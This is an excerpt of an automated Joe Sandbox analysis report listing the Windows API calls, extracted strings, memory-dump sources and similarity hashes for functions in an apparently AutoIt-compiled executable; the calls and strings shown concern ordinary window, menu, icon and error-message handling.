                                                                                              • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                                              • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                                                              APIs
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window
                                                                                              • String ID: 0
                                                                                              • API String ID: 2353593579-4108050209
                                                                                              • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                              • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                                              • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                              • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                                              APIs
                                                                                              • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                                              • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                                              • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                                              • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                                              • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                                              • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                                              • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                                              • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                                              • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                                              • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                                              • GetSysColor.USER32(00000008), ref: 0044A265
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                                              • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                              • String ID:
                                                                                              • API String ID: 1744303182-0
                                                                                              • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                              • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                                              • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                              • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                                              • __mtterm.LIBCMT ref: 00417C34
                                                                                                • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                                                • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                                                • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                                                • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                                              • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                                              • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                                              • __init_pointers.LIBCMT ref: 00417CE6
                                                                                              • __calloc_crt.LIBCMT ref: 00417D54
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                              • API String ID: 4163708885-3819984048
                                                                                              • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                              • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                                              • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                              • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                              • API String ID: 0-1896584978
                                                                                              • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                              • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                                              • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                              • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wcsicoll$IconLoad
                                                                                              • String ID: blank$info$question$stop$warning
                                                                                              • API String ID: 2485277191-404129466
                                                                                              • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                              • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                                              • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                              • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                                              APIs
                                                                                              • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                                              • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                                              • GetDesktopWindow.USER32 ref: 0045476F
                                                                                              • GetWindowRect.USER32(00000000), ref: 00454776
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                                              • GetClientRect.USER32(?,?), ref: 004547D2
                                                                                              • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                                              • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                              • String ID:
                                                                                              • API String ID: 3869813825-0
                                                                                              • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                              • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                                              • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                              • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00464B28
                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                                              • _wcslen.LIBCMT ref: 00464C28
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                                              • _wcslen.LIBCMT ref: 00464CBA
                                                                                              • _wcslen.LIBCMT ref: 00464CD0
                                                                                              • _wcslen.LIBCMT ref: 00464CEF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$Directory$CurrentSystem
                                                                                              • String ID: D
                                                                                              • API String ID: 1914653954-2746444292
                                                                                              • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                                              • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                                              • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                                              • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wcsicoll
                                                                                              • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                              • API String ID: 3832890014-4202584635
                                                                                              • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                              • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                                              • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                              • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                                              • GetFocus.USER32 ref: 0046A0DD
                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost$CtrlFocus
                                                                                              • String ID: 0
                                                                                              • API String ID: 1534620443-4108050209
                                                                                              • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                                              • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                                              • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                                              • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(?), ref: 004558E3
                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CreateDestroy
                                                                                              • String ID: ,$tooltips_class32
                                                                                              • API String ID: 1109047481-3856767331
                                                                                              • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                              • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                                              • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                              • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                                              • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                                              • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                                              • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                                              • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                                              • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                                              • GetMenuItemCount.USER32 ref: 00468CFD
                                                                                              • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                                              • GetCursorPos.USER32(?), ref: 00468D3F
                                                                                              • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                                              • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                                              • String ID: 0
                                                                                              • API String ID: 1441871840-4108050209
                                                                                              • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                                              • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                                              • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                                              • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                              • __swprintf.LIBCMT ref: 00460915
                                                                                              • __swprintf.LIBCMT ref: 0046092D
                                                                                              • _wprintf.LIBCMT ref: 004609E1
                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                               • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                              • API String ID: 3631882475-2268648507
                                                                                              • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                              • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                                              • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                              • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                                              APIs
                                                                                              • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                                              • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                                              • SendMessageW.USER32 ref: 00471740
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                                              • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                                              • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                                              • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                                              • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                                              • SendMessageW.USER32 ref: 0047184F
                                                                                              • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
